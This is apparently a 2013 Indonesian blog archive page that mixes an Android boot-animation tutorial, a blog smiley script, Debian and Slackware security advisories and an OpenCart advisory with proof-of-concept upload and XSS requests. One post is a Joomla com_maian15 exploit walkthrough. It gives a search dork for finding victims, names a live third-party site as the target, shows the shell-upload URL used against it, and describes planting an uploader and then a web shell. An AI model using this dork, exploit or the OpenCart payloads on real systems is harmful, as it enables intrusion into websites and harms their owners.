<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp9MIaslSDzPNl3gZi8WbBNqr0csIhSS6wLVr84Nc0_7wowkI79S9X0cQ-JkBYubjEbgw7ZRlik3MA2zkh85GVLDbIoV0G71SOLamWkYRbW5t1lCvZiPORvGu_9rfZZ55gCvI9SZwJf8Y/s400/bootanimation2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp9MIaslSDzPNl3gZi8WbBNqr0csIhSS6wLVr84Nc0_7wowkI79S9X0cQ-JkBYubjEbgw7ZRlik3MA2zkh85GVLDbIoV0G71SOLamWkYRbW5t1lCvZiPORvGu_9rfZZ55gCvI9SZwJf8Y/s320/bootanimation2.jpg" width="320" /></a></div>
 
 
 
 
3. Kasi nama gambar-gambar *.png yang udah dibuat sebelumnya sesuai urutan 
Contoh : 000.png, 001.png, 002.png, 003.png dan seterusnya. 
 
4. Masukin gambar-gambar td ke dalam 2 buah folder yang telah dibuat. (Part0 dan Part1) 
kek gini : 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYJGOjRGW5Z2_SbCFB5BVsADOeutVynJIk752ay0lp8k6wjooFHOWqo-bqYAQZ8NQrh2Blh6m5dI1Cgznyp16Oud-C-lmHMH1arvupiYEaTncDMUh4bMkNTz9RsfwVjdHjSz1CuCnZmI/s400/bootanimation1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYJGOjRGW5Z2_SbCFB5BVsADOeutVynJIk752ay0lp8k6wjooFHOWqo-bqYAQZ8NQrh2Blh6m5dI1Cgznyp16Oud-C-lmHMH1arvupiYEaTncDMUh4bMkNTz9RsfwVjdHjSz1CuCnZmI/s320/bootanimation1.jpg" width="320" /></a></div>
 
 
5. Masukan gambar animasi pertama ke folder Part0, dan animasi kedua ke 
folder Part1 Nama gambar dalam folder part1 harus kelanjutan dari part0,
 contohnya nama gambar terakhir di folder part0 itu 023.png, maka gambar
 awal di folder part1 harus 024.png, 025.png, dan seterusnya. 
<blockquote class="tr_bq">
*Pastikan tidak ada file bernama Thumb.db di dalam semua folder Part0 
dan Part1. jika ada, hapus file itu. Karena file Thumb.db itu filesystem
 dan biasanya di hidden. maka sebaiknya ente meng-unhide dulu file-file 
yg terhidden </blockquote>
6. Bikin dan buka file desc.txt dan ketikan dengan kode berikut : 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqKNcZpn-Rf7AWT_MDhMU0JMib1BSfzDX8WW-AASlhipSbSkL4LYE_JyUxQQ2I_-SNr4lD62rpOda7TlkEvEWHfVr3ZGWzEkbrLt-IzapNOGbaLNQHYroBOt2LsymXqK7kphDEoe1ioZU/s400/bootanimation3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqKNcZpn-Rf7AWT_MDhMU0JMib1BSfzDX8WW-AASlhipSbSkL4LYE_JyUxQQ2I_-SNr4lD62rpOda7TlkEvEWHfVr3ZGWzEkbrLt-IzapNOGbaLNQHYroBOt2LsymXqK7kphDEoe1ioZU/s320/bootanimation3.jpg" width="320" /></a></div>
<blockquote class="tr_bq">
Penjelasan dari kode di atas : 
 
320 480 : Ukuran gambar yang dibuat (sesuai dengan ukuran layar Android ente). 
 
24 : kecepatan loading frame per detik (semakin besar makin cepat). 
 
p 1 0 part0 : Seluruh gambar dalam folder part0 tidak looping (berulang-ulang) sehabis di-load. 
 
p 0 0 part1 : Seluruh gambar dalam folder part1 looping (berulang-ulang) sehabis load gambar terakhir.</blockquote>
7. Terakhir buat zip filenya. (dengan menggunakan software winzip, winrar, 7zip , dsb). 
(CTRL+A) folder “part0”, “part1” dan file “desc.txt” --> Klik Kanan Add to archive... 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38X7XKyYqrMtquMg1a2u7G6IXTlVZmvbRvpqgTCvKo4VxqiOhRARWC6vwKnUa58omBE3sHuMsOln6UjCgxyG2vr4pyzGTSh12NsUQct8PJbqiCGpRk2IOJOuIO-ea0OvCgdjrALi6zKA/s400/bootanimation4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38X7XKyYqrMtquMg1a2u7G6IXTlVZmvbRvpqgTCvKo4VxqiOhRARWC6vwKnUa58omBE3sHuMsOln6UjCgxyG2vr4pyzGTSh12NsUQct8PJbqiCGpRk2IOJOuIO-ea0OvCgdjrALi6zKA/s320/bootanimation4.jpg" width="320" /></a></div>
 
 
 
 
8. Archive format-nya : .ZIP dan compression method-nya "Store" 
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5mNOmzo0wSiGCourLMCWfg-DQ7MTpDb3ZwA9ccRfVDZgiP01BzILk697dotIlGsaUNjRCb9BFHcwql_TrZRGr3LSiWBKbpCm1FL8AiwnmLw9GTHOJJRQop568bCNrLywGWm3kE0ciFy0/s400/bootanimation5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5mNOmzo0wSiGCourLMCWfg-DQ7MTpDb3ZwA9ccRfVDZgiP01BzILk697dotIlGsaUNjRCb9BFHcwql_TrZRGr3LSiWBKbpCm1FL8AiwnmLw9GTHOJJRQop568bCNrLywGWm3kE0ciFy0/s320/bootanimation5.jpg" width="320" /></a></div>
 
 
 
9. Kasi nama file tersebut : bootanimation.zip 
10. Selesai. Tinggal diinstall ke HH ente. 
 
Cara Install : 
 
<blockquote class="tr_bq">
Pake Root Explorer, Copy bootanimation.zip ke /system/media 
Rubah permission nya jadi rw -r -r 
Reboot</blockquote>
Hasil Jadi: 
install flash via CWM/TWRP 
<a href="http://d-h.st/4UM" rel="nofollow" target="_blank">DOWNLOAD</a> 
 
<a href="http://www.hanivinside.net/2013/11/cara-membuat-boot-animation-android.html">Source</a>

Tutor Membuat Boot Animation Android

Alat dan bahan yang perlu disiapin : - Image Editor, misal Photoshop. ente bebas mau pake software apa aja buat bikin gambar bootanimation. - Archiver/Compressing Tool, misal Winrar. buat ng'bundle g…

10 Dec 2013

Menambahkan Smiley di Halaman Posting Blog [Ounion Head]

:hai 
kembali lagi dengan saya <a href="http://twitter.com/momodrock">@MomodRock</a> yang lagi-lagi masih sempat berbagi di blog aneh ini :mewek 
 
Kali ini saya akan share script smiley yang saya gunakan di blog ini, :o 
contoh smiley: 
:dead :mewek :smangat :mad :hai :ngakak  dll :p 
 
Okedeh, langsung pasang aja sob :yes 
1. Login Blogger,. 
2. Edit Template, 
3. Cari kode ]]></b:skin> 
4. Paste kode ini, Tepat di bawah kode  ]]></b:skin> 
<blockquote class="tr_bq">
https://sites.google.com/site/m0dr0okfiles/home/addSmiley.js</blockquote>

Gitu aja :ngakak 
kalau script nya terlalu berat, silahkan di edit sob, pakai smiley seperlunya saja :) 
 
Cara gunainnya tinggal tuliskan :mewe*k (tanpa bintang) maka jadilah :mewek  
 
<blockquote class="tr_bq">
untuk melihat semua kode smiley bisa dilihat >><a href="http://devilzc0de.org/forum/misc.php?action=smilies&popup=true&editor=clickableEditor">di sini<</a>< sob</blockquote>
------ 
 
Sekian :mohon 
:bye

Menambahkan Smiley di Halaman Posting Blog [Ounion Head]

:hai kembali lagi dengan saya @MomodRock yang lagi-lagi masih sempat berbagi di blog aneh ini :mewek Kali ini saya akan share script smiley yang saya gunakan di blog ini, :o contoh smiley: :dead :mewe…

07 Dec 2013

[SECURITY] [DSA 2811-1] chromium-browser security update

-----BEGIN PGP SIGNED MESSAGE-----
 
Hash: SHA512
 
 
- -------------------------------------------------------------------------
 
Debian Security Advisory DSA-2811-1 <a href="mailto:security@debian.org">security@debian.org</a>
 
<a href="http://www.debian.org/security/">http://www.debian.org/security/</a> Michael Gilbert
 
December 07, 2013 <a href="http://www.debian.org/security/faq">http://www.debian.org/security/faq</a>
 
- -------------------------------------------------------------------------
 
 
Package : chromium-browser
 
Vulnerability : several
 
Problem type : remote
 
Debian-specific: no
 
CVE ID : CVE-2013-6634 CVE-2013-6635 CVE-2013-6636 CVE-2013-6637 
 
CVE-2013-6638 CVE-2013-6639 CVE-2013-6640
 
 
Several vulnerabilities have been discovered in the chromium web browser.
 
 
CVE-2013-6634
 
 
Andrey Labunets discovered that the wrong URL was used during
 
validation in the one-click sign on helper.
 
 
CVE-2013-6635
 
 
cloudfuzzer discovered use-after-free issues in the InsertHTML and
 
Indent DOM editing commands.
 
 
CVE-2013-6636
 
 
Bas Venis discovered an address bar spoofing issue.
 
 
CVE-2013-6637
 
 
The chrome 31 development team discovered and fixed multiple issues
 
with potential security impact.
 
 
CVE-2013-6638
 
 
Jakob Kummerow of the Chromium project discoved a buffer overflow in
 
the v8 javascript library.
 
 
CVE-2013-6639
 
 
Jakob Kummerow of the Chromium project discoved an out-of-bounds
 
write in the v8 javascript library.
 
 
CVE-2013-6640
 
 
Jakob Kummerow of the Chromium project discoved an out-of-bounds
 
read in the v8 javascript library.
 
 
For the stable distribution (wheezy), these problems have been fixed in
 
version 31.0.1650.63-1~deb7u1.
 
 
For the testing distribution (jessie), these problems will be fixed soon.
 
 
For the unstable distribution (sid), these problems have been fixed in
 
version 31.0.1650.63-1.
 
 
We recommend that you upgrade your chromium-browser packages.
 
 
Further information about Debian Security Advisories, how to apply
 
these updates to your system and frequently asked questions can be
 
found at: <a href="http://www.debian.org/security/">http://www.debian.org/security/</a>
 
 
Mailing list: <a href="mailto:debian-security-announce@lists.debian.org">debian-security-announce@lists.debian.org</a>
 
-----BEGIN PGP SIGNATURE-----
 
Version: GnuPG v1.4.15 (GNU/Linux)
 
 
iQQcBAEBCgAGBQJSo+2XAAoJELjWss0C1vRzcIcf/0IeLihtqzUhizWyxZEDPlEq
 
ZWfz1Vjo42ZqDJDacvh5HqdLARgVXsiRhJFqmcuThOxJGWR961zJEBCVa0uXbqpN
 
TuRI+YY7viTyrBXCa29RX9cB/EADmkqeFswMb1RpcgbmxJaSoOUU0bdqX2fOrN8E
 
yDTwSe//XQRinGuajNiBO1sWyGmRzquZnZwgmWL37raqg8eLKhHvYeuL+TQvVQwi
 
9/orPVoMELNDKrlupWFXChZSvc8kUuXAuBk0UI4OlTupsscsiaEWOdcPRssTwIO+
 
Zk9j7XS1OxZAcHD4iO8BeiGJjjymUvcqB7w8dv/S/2ehAYlptab0QNzsG//FTKGa
 
UuNgzD2d8ntMcXSXdcs2BqmWYFF2CI1hQYgCdSUGAp5nRjp8Y3TV+VykmgzjzMHN
 
nOIEXOHSsagMbn1pfmEn8mYv/Hkz38f04LStchD62Mvb9QHXQNtr9TOiJ3wbz3UI
 
wNN1faGePKz6bO3X2tSQboWmKjOfDL5XBJC27Jovpbyqk8zDA5ConHshkxSL7SPX
 
2MjMjbSUO1rpjehA1PLuruOwVQd1uRL/IgEhAqMWlXcwFI3Lo8C3pZfRHuuTQpJx
 
zUbVq6Kr88EoXfF7P6KnYd10C8mOwMu6Hj5iB/go7gOEiXrqGVa2KlVTVhVege9P
 
WDFweF5dYYhZ1kAB5nxzza5KZJtXX9aFkAK1fmyEc7CwyRB19r+Sm3TQwstgoF0t
 
0CPCwqQJNG2kLsir4nnB6mcJX9pkwX469qSeWul+3pp5026KmVGXhGtk7pcdIN7j
 
Qyav6UD2bywqt+5RaIIp+hygo1ZOkJ0bhni4PUK1IdCwC3aZqf1pukguBDy7zZb7
 
UqEzRyoaLgH0S0tmGnvFj/gRWMzkyxXLS/U84d/rBLVV61Irig/4G+gNlAaF2t1p
 
aSluBs5OOuGmyYNzQgs8jNmGdUR4Rx4l7a0Nol9jw8nwMMTjp7VQRUB4uMEWVOQ1
 
4ooAJ2ne3vqupJ1E21zk71d24+4MYrr/B2mXYQ0GsaDU+0bnODiEbKsliGwoRQGq
 
2ZXDzL+0SDLossIPYLWTx1s+DChrzoEVdp6n/3z6uul9/AzNc6U2FsCU1XAh3G/+
 
7LDqBIcnRX/fQ9p1yxPwo16kko5mJQlKkqgI9IDpNM/Lg7FCVl4+yE7uqR1B1fsc
 
WJN+t0M9uEO6EMO4pK/c91Xna2JP7xVcqsaCf1QI3WhNQnHoGzSX7E/BZYDkUmlR
 
kdkBp6F4izLt3hrz0qaVgIrslrPNwHphMOIlX/TzPMhY6etqQLQ8GXIS7SbqgG53
 
yWLQbsqo+1/d5QtTox5JfPFFTRCLKJGP8UrHjN7ZMmlBnTuZ5jR0oO+ITube2pM=
 
=5Qyo
 
-----END PGP SIGNATURE-----

[SECURITY] [DSA 2811-1] chromium-browser security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2811-1 security@debian.org ht…

07 Dec 2013

Exploit Joomla component com_maian15 upload shell Vulnerability

<img alt="peace" border="0" src="http://devilzc0de.org/forum/images/smilies/peace.gif" style="vertical-align: middle;" title="peace" /> 
 
okedeh cekidot: 
cari target dlu.. 
 
<blockquote>
Dork: inurl:"option=com_maian15" 
silahkan dikembangkan <img alt="piss" border="0" src="http://devilzc0de.org/forum/images/smilies/005.gif" style="vertical-align: middle;" title="piss" /></blockquote>
 
disini ane kasih 1 live target.. 
<a href="http://www.akindeledecker.com/C2-LyricalOverflow/" rel="nofollow" target="_blank">http://www.akindeledecker.com/C2-LyricalOverflow/</a> 
 
exploit: 
<blockquote>
administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cekson.php</blockquote>
 
langsung inject om,.. 
<blockquote>
<a href="http://www.akindeledecker.com/C2-LyricalOverflow/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=cekson.php" rel="nofollow" target="_blank">http://www.akindeledecker.com/C2-Lyrical...cekson.php</a></blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i44.tinypic.com/219b3ih.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="98" src="http://i44.tinypic.com/219b3ih.png" width="320" /></a></div>

<div class="spoiler_wrap">
 <div class="spoiler_header">
 </div>
</div>
NB: sebenarnya ntuh file udah terupload.. dgn nama file cekson.php tapi isi filenya gak ada <img alt="hammer" border="0" src="http://devilzc0de.org/forum/images/smilies/hammer.gif" style="vertical-align: middle;" title="hammer" /> 
 
lanjut,. kita gunakan live http header (add on moksilla <img alt="hammer" border="0" src="http://devilzc0de.org/forum/images/smilies/hammer.gif" style="vertical-align: middle;" title="hammer" />) 
<div class="spoiler_wrap">
 <div class="spoiler_header">
 </div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i41.tinypic.com/vfyslh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="209" src="http://i41.tinypic.com/vfyslh.png" width="320" /></a></div>
klik replay.. 
 
 
langsung parkir backdoor <img alt="ketawa" border="0" src="http://devilzc0de.org/forum/images/smilies/ketawa.gif" style="vertical-align: middle;" title="ketawa" /> tapi disini ane gak langsung parkir backdoor <img alt="hammer" border="0" src="http://devilzc0de.org/forum/images/smilies/hammer.gif" style="vertical-align: middle;" title="hammer" /> , ane cuma parkir uploader <img alt="hmm" border="0" src="http://devilzc0de.org/forum/images/smilies/gg.gif" style="vertical-align: middle;" title="hmm" /> 
uploader dari om unyil <img alt="malu" border="0" src="http://devilzc0de.org/forum/images/smilies/1.gif" style="vertical-align: middle;" title="malu" /> 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i42.tinypic.com/fc4itd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://i42.tinypic.com/fc4itd.png" width="320" /></a></div>
 
 
<div class="spoiler_wrap">
 <div class="spoiler_header">
 </div>
</div>
klik replay 
 
dan walaaaa... <img alt="shock" border="0" src="http://devilzc0de.org/forum/images/smilies/shock.gif" style="vertical-align: middle;" title="shock" /> 
uploader ane sdh tertanam <img alt="kalem" border="0" src="http://devilzc0de.org/forum/images/smilies/kalem.gif" style="vertical-align: middle;" title="kalem" /> 
direktori file: 
<blockquote>
administrator/components/com_maian15/charts/tmp-upload-images/cekson.php</blockquote>
<div class="spoiler_wrap">
 <div class="spoiler_header">
 </div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i39.tinypic.com/2czsmcp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="http://i39.tinypic.com/2czsmcp.png" width="320" /></a></div>
 
Sekarang tinggal upload "the real shell" <img alt=":P" border="0" src="http://devilzc0de.org/forum/images/smilies/melet.gif" style="vertical-align: middle;" title=":P" /> 
 
sekian tutor cupu dari ane 
 
Maaf trit nnya berantakan :ngakak malas edit T.T 
 
 
 
 
<img alt="mohon" border="0" src="http://devilzc0de.org/forum/images/smilies/mohon.gif" style="vertical-align: middle;" title="mohon" />

Exploit Joomla component com_maian15 upload shell Vulnerability

okedeh cekidot: cari target dlu.. Dork: inurl:"option=com_maian15" silahkan dikembangkan disini ane kasih 1 live target.. http://www.akindeledecker.com/C2-LyricalOverflow/ exploit: administrator/co…

06 Dec 2013

Opencart Multiple Vulnerabilities

###########################################################################
 # Title: Opencart Multiple Vulnerabilities
 # Vendor: <a href="http://www.opencart.com">http://www.opencart.com</a>
 # Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure
 # Vulnerable Version: opencart 1.5.6 (prior versions also may be affected)
 # Exploitation: Remote with browser
 # Impact: High
 # Vendor Supplied Patch: N/A
 # Original Advisory with Workaround: 
 # <a href="http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html">http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html</a>
 ###########################################################################
 
 ####################
 - Description:
 ####################
 
 Quote from vendor: OpenCart is a turn-key ready "out of the box" shopping cart solution.
 You simply install, select your template, add products and you're ready to start accepting orders.
 
 
 ####################
 - Vulnerability:
 ####################
 In the process of optimizing our crawler engine by <a href="http://garda.ir">garda.ir</a> (<a href="http://garda.ir">garda.ir</a> is a Persian online shopping price comparison service which uses new search engine technologies to grab prices) we found file upload vulnerability in opencart application, further investigation lead us to discover other vulnerabilities such as path disclosure and xss.
 
 
 
 ####################
 - POC:
 ####################
 
 # 1
 # File Upload
 # Insufficient Authorization in /catalog/controller/product/product.php 
 # Result: testupload.txt.somehash is created in /download folder
 
 
 POST /opencart-1.5.6/index.php?route=product/product/upload HTTP/1.1
 Host: <a href="http://example.com">example.com</a>
 Content-Type: multipart/form-data; boundary=---------------------------4827543632391
 Content-Length: 206
 Connection: Keep-Alive
 
 
 -----------------------------4827543632391
 Content-Disposition: form-data; name="file"; filename="testupload.txt"
 Content-Type: text/plain
 
 testtesttest
 -----------------------------4827543632391--
 
 
 # 2
 # Reflected XSS and Path Disclosure
 # Input Validation Error in /catalog/controller/account/register.php
 # Result: this will cause arbitrary scripting code to be executed by the # target user's browser.
 
 POST /opencart-1.5.6/index.php?route=account/register HTTP/1.1
 Content-Type: multipart/form-data; boundary=---------------------------1e7a98bc645efbe7
 Content-Length: 181
 Host: <a href="http://example.com">example.com</a>
 Connection: Keep-Alive
 
 
 -----------------------------1e7a98bc645efbe7
 Content-Disposition: form-data; name="zone_id"
 
 12345'+alert(document.cookie)+'
 -----------------------------1e7a98bc645efbe7--
 
 
 # 3
 # Information Leakage – Path Disclosure
 # Insufficient Authorization in /system/logs/error.txt 
 # Result: Information Disclosure
 
 <a href="http://www.example.com/opencart-1.5.6/system/logs/error.txt">http://www.example.com/opencart-1.5.6/system/logs/error.txt</a>
 
 
 ####################
 - Solution:
 ####################
 There is no Vendor Supplied Patch at the time of this entry.
 For workaround check the Original Advisory.
 
 
 ####################
 - Credit:
 ####################
 Discovered by: trueend5 (trueend5 [at] yahoo com)
 
 This advisory is sponsored by <a href="http://garda.ir">garda.ir</a>
 <a href="http://www.garda.ir">http://www.garda.ir</a>
 A Persian online shopping price comparison service

Opencart Multiple Vulnerabilities

########################################################################### # Title: Opencart Multiple Vulnerabilities # Vendor: http://www.opencart.com # Vulnerabilities: Arbitrary File Upload, XSS, …

06 Dec 2013

[slackware-security] hplip (SSA:2013-339-04)

-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 
 [slackware-security] hplip (SSA:2013-339-04)
 
 New hplip packages are available for Slackware 14.0 to fix a security issue.
 
 
 Here are the details from the Slackware 14.0 ChangeLog:
 +--------------------------+
 patches/packages/hplip-3.12.9-i486-4_slack14.0.txz: Rebuilt.
 This update disables the automatic upgrade feature which can be easily
 fooled into downloading an arbitrary binary and executing it. This
 issue affects only Slackware 14.0 (earlier versions do not have the
 feature, and newer ones had already disabled it).
 For more information, see:
 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6427">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6427</a>
 (* Security fix *)
 +--------------------------+
 
 
 Where to find the new packages:
 +-----------------------------+
 
 Thanks to the friendly folks at the OSU Open Source Lab
 (<a href="http://osuosl.org">http://osuosl.org</a>) for donating FTP and rsync hosting
 to the Slackware project! :-)
 
 Also see the "Get Slack" section on <a href="http://slackware.com">http://slackware.com</a> for
 additional mirror sites near you.
 
 Updated package for Slackware 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/hplip-3.12.9-i486-4_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/hplip-3.12.9-i486-4_slack14.0.txz</a>
 
 Updated package for Slackware x86_64 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/hplip-3.12.9-x86_64-4_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/hplip-3.12.9-x86_64-4_slack14.0.txz</a>
 
 
 MD5 signatures:
 +-------------+
 
 Slackware 14.0 package:
 6838bc89361bf4dd0011ad4d46b98bf0 hplip-3.12.9-i486-4_slack14.0.txz
 
 Slackware x86_64 14.0 package:
 a5193660b2318e29aa5586ead1feb126 hplip-3.12.9-x86_64-4_slack14.0.txz
 
 
 Installation instructions:
 +------------------------+
 
 Upgrade the package as root:
 # upgradepkg hplip-3.12.9-i486-4_slack14.0.txz
 
 
 +-----+
 
 Slackware Linux Security Team
 <a href="http://slackware.com/gpg-key">http://slackware.com/gpg-key</a>
 <a href="mailto:security@slackware.com">security@slackware.com</a>
 
 +------------------------------------------------------------------------+
 | To leave the slackware-security mailing list: |
 +------------------------------------------------------------------------+
 | Send an email to <a href="mailto:majordomo@slackware.com">majordomo@slackware.com</a> with this text in the body of |
 | the email message: |
 | |
 | unsubscribe slackware-security |
 | |
 | You will get a confirmation message back containing instructions to |
 | complete the process. Please do not reply to this email address. |
 +------------------------------------------------------------------------+
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.4.15 (GNU/Linux)
 
 iEYEARECAAYFAlKhGLEACgkQakRjwEAQIjOXJACeII9YkNxj5hCdV8IsolOSPAyY
 oacAn0ha/+Utsg/q+1av9T7vJ770HDJS
 =3mBc
 -----END PGP SIGNATURE-----

[slackware-security] hplip (SSA:2013-339-04)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] hplip (SSA:2013-339-04) New hplip packages are available for Slackware 14.0 to fix a security issue. Here are the details from the S…

05 Dec 2013

[slackware-security] seamonkey (SSA:2013-339-03)

-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 
 [slackware-security] seamonkey (SSA:2013-339-03)
 
 New seamonkey packages are available for Slackware 14.0, 14.1, and -current to
 fix security issues.
 
 
 Here are the details from the Slackware 14.1 ChangeLog:
 +--------------------------+
 patches/packages/seamonkey-2.22.1-i486-1_slack14.1.txz: Upgraded.
 This update contains security fixes and improvements.
 For more information, see:
 <a href="http://www.mozilla.org/security/known-vulnerabilities/seamonkey.html">http://www.mozilla.org/security/known-vulnerabilities/seamonkey.html</a>
 (* Security fix *)
 patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.1.txz: Upgraded.
 +--------------------------+
 
 
 Where to find the new packages:
 +-----------------------------+
 
 Thanks to the friendly folks at the OSU Open Source Lab
 (<a href="http://osuosl.org">http://osuosl.org</a>) for donating FTP and rsync hosting
 to the Slackware project! :-)
 
 Also see the "Get Slack" section on <a href="http://slackware.com">http://slackware.com</a> for
 additional mirror sites near you.
 
 Updated packages for Slackware 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-2.22.1-i486-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-2.22.1-i486-1_slack14.0.txz</a>
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.0.txz</a>
 
 Updated packages for Slackware x86_64 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.0.txz</a>
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.0.txz</a>
 
 Updated packages for Slackware 14.1:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-2.22.1-i486-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-2.22.1-i486-1_slack14.1.txz</a>
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/seamonkey-solibs-2.22.1-i486-1_slack14.1.txz</a>
 
 Updated packages for Slackware x86_64 14.1:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-2.22.1-x86_64-1_slack14.1.txz</a>
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/seamonkey-solibs-2.22.1-x86_64-1_slack14.1.txz</a>
 
 Updated packages for Slackware -current:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/seamonkey-solibs-2.22.1-i486-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/seamonkey-solibs-2.22.1-i486-1.txz</a>
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.22.1-i486-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.22.1-i486-1.txz</a>
 
 Updated packages for Slackware x86_64 -current:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/seamonkey-solibs-2.22.1-x86_64-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/seamonkey-solibs-2.22.1-x86_64-1.txz</a>
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.22.1-x86_64-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.22.1-x86_64-1.txz</a>
 
 
 MD5 signatures:
 +-------------+
 
 Slackware 14.0 packages:
 b315acb9ea10513ff46123c075f82820 seamonkey-2.22.1-i486-1_slack14.0.txz
 a53c11c7ab826f27815e89d1ae39f368 seamonkey-solibs-2.22.1-i486-1_slack14.0.txz
 
 Slackware x86_64 14.0 packages:
 97ee71cc5f91efd556ad29baa4695bb2 seamonkey-2.22.1-x86_64-1_slack14.0.txz
 7eaab4ea075b79f0b67894e5b8fc8782 seamonkey-solibs-2.22.1-x86_64-1_slack14.0.txz
 
 Slackware 14.1 packages:
 9d2fddecd536ed84b76c7b134c440d77 seamonkey-2.22.1-i486-1_slack14.1.txz
 50cb6c7e926a98552837e51294906d63 seamonkey-solibs-2.22.1-i486-1_slack14.1.txz
 
 Slackware x86_64 14.1 packages:
 f40c8b4207c4e4d2a521cc4cc0b17722 seamonkey-2.22.1-x86_64-1_slack14.1.txz
 9e155f4b9a9f241030436926970002ca seamonkey-solibs-2.22.1-x86_64-1_slack14.1.txz
 
 Slackware -current packages:
 b42a26ca28c58839abed995ad9962415 l/seamonkey-solibs-2.22.1-i486-1.txz
 e1cab57251ca72b8cf82d6749959a1ea xap/seamonkey-2.22.1-i486-1.txz
 
 Slackware x86_64 -current packages:
 7146b57158804ae43e644da69f3ca18a l/seamonkey-solibs-2.22.1-x86_64-1.txz
 153ebf91193138b897b66b581b6c57c1 xap/seamonkey-2.22.1-x86_64-1.txz
 
 
 Installation instructions:
 +------------------------+
 
 Upgrade the packages as root:
